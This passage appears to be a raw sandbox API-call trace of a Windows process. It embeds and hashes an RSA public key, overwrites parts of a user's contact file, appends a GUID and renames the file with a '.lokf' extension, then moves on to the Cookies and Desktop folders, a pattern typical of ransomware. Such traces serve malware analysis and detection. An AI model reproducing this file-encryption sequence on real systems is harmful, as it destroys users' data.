hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.391] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.391] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x494, lpOverlapped=0x0) returned 1 [0058.392] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.392] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.392] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.392] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.392] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.392] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.392] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.392] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.392] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.392] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.392] GetLastError () returned 0x0 [0058.393] SetLastError (dwErrCode=0x0) [0058.393] GetLastError () returned 0x0 [0058.393] SetLastError (dwErrCode=0x0) [0058.393] GetLastError () returned 0x0 [0058.393] SetLastError (dwErrCode=0x0) [0058.393] GetLastError () returned 0x0 [0058.393] SetLastError (dwErrCode=0x0) [0058.393] GetLastError () returned 0x0 [0058.393] SetLastError (dwErrCode=0x0) [0058.393] GetLastError () returned 0x0 [0058.393] SetLastError (dwErrCode=0x0) [0058.393] GetLastError () returned 0x0 [0058.393] SetLastError (dwErrCode=0x0) [0058.393] GetLastError () returned 0x0 [0058.393] SetLastError (dwErrCode=0x0) [0058.393] GetLastError () returned 0x0 [0058.393] SetLastError (dwErrCode=0x0) [0058.393] GetLastError () returned 0x0 [0058.393] SetLastError (dwErrCode=0x0) [0058.393] GetLastError () returned 0x0 [0058.393] SetLastError (dwErrCode=0x0) [0058.393] GetLastError () returned 0x0 [0058.393] SetLastError (dwErrCode=0x0) [0058.393] GetLastError () returned 0x0 [0058.393] SetLastError (dwErrCode=0x0) [0058.393] GetLastError () returned 0x0 [0058.393] SetLastError (dwErrCode=0x0) [0058.393] GetLastError () returned 0x0 [0058.393] SetLastError (dwErrCode=0x0) [0058.393] GetLastError () returned 0x0 [0058.394] SetLastError (dwErrCode=0x0) [0058.394] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.394] GetLastError () returned 0x0 [0058.394] SetLastError (dwErrCode=0x0) [0058.394] GetLastError () returned 0x0 [0058.394] SetLastError (dwErrCode=0x0) [0058.394] GetLastError () returned 0x0 [0058.394] SetLastError (dwErrCode=0x0) [0058.394] GetLastError () returned 0x0 [0058.394] SetLastError (dwErrCode=0x0) [0058.394] GetLastError () returned 0x0 [0058.394] SetLastError (dwErrCode=0x0) [0058.394] GetLastError () returned 0x0 [0058.394] SetLastError (dwErrCode=0x0) [0058.394] GetLastError () returned 0x0 [0058.394] SetLastError (dwErrCode=0x0) [0058.394] GetLastError () returned 0x0 [0058.394] SetLastError (dwErrCode=0x0) [0058.394] GetLastError () returned 0x0 [0058.394] SetLastError (dwErrCode=0x0) [0058.394] GetLastError () returned 0x0 [0058.394] SetLastError (dwErrCode=0x0) [0058.394] GetLastError () returned 0x0 [0058.394] SetLastError (dwErrCode=0x0) [0058.394] GetLastError () returned 0x0 [0058.394] SetLastError (dwErrCode=0x0) [0058.394] GetLastError () returned 0x0 [0058.394] SetLastError (dwErrCode=0x0) [0058.394] GetLastError () returned 0x0 [0058.394] SetLastError (dwErrCode=0x0) [0058.395] GetLastError () returned 0x0 [0058.395] SetLastError (dwErrCode=0x0) [0058.395] GetLastError () returned 0x0 [0058.395] SetLastError (dwErrCode=0x0) [0058.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.395] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.395] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0058.395] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.395] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.395] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.395] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.395] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.395] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.395] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x490) returned 0x32947b0 [0058.395] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.395] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0058.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32987b8 [0058.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f2b0 [0058.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298800 [0058.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f2c8 [0058.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ace0 [0058.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ae00 [0058.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x3292fe8 [0058.395] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x3292fe8, Size=0x218) returned 0x3294c48 [0058.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0058.395] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ace0 | out: hHeap=0x660000) returned 1 [0058.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ae00 | out: hHeap=0x660000) returned 1 [0058.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0058.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ae00 [0058.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6ace0 [0058.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0058.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0058.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0058.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ae00 | out: hHeap=0x660000) returned 1 [0058.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ace0 | out: hHeap=0x660000) returned 1 [0058.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0058.396] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294c48 | out: hHeap=0x660000) returned 1 [0058.396] GetCurrentThreadId () returned 0x9e0 [0058.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x6c26f0 [0058.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0058.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.397] GetCurrentThreadId () returned 0x9e0 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3292fe8 [0058.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3282810 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ace0 [0058.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0058.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0058.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0058.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ae00 [0058.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0058.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0058.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac20 [0058.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0058.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0058.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0058.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0058.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac50 [0058.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0058.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0058.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0058.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.398] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x494, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.398] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.399] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.399] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.399] CloseHandle (hObject=0x5cc) returned 1 [0058.399] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.lokf")) returned 1 [0058.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.400] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0058.401] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0058.401] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0058.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32619a0 | out: hHeap=0x660000) returned 1 [0058.401] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.401] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.401] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0058.401] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0058.401] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0058.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.401] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.401] PathFindFileNameW (pszPath="") returned="" [0058.401] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0058.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0058.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32619a0 | out: hHeap=0x660000) returned 1 [0058.401] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.401] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.401] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0058.402] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0058.402] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0058.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.402] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.402] PathFindFileNameW (pszPath="") returned="" [0058.402] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb331210, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0xb331210, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.402] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb331210, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0xb331210, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.402] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89363db0, ftCreationTime.dwHighDateTime=0x1d4ce17, ftLastAccessTime.dwLowDateTime=0x953570b0, ftLastAccessTime.dwHighDateTime=0x1d4cca3, ftLastWriteTime.dwLowDateTime=0x953570b0, ftLastWriteTime.dwHighDateTime=0x1d4cca3, nFileSizeHigh=0x0, nFileSizeLow=0x1840e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1jqP 8uN4qhj8sMm4.flv", cAlternateFileName="1JQP8U~1.FLV")) returned 1 [0058.402] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1jqP 8uN4qhj8sMm4.flv") returned=".flv" [0058.402] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1jqP 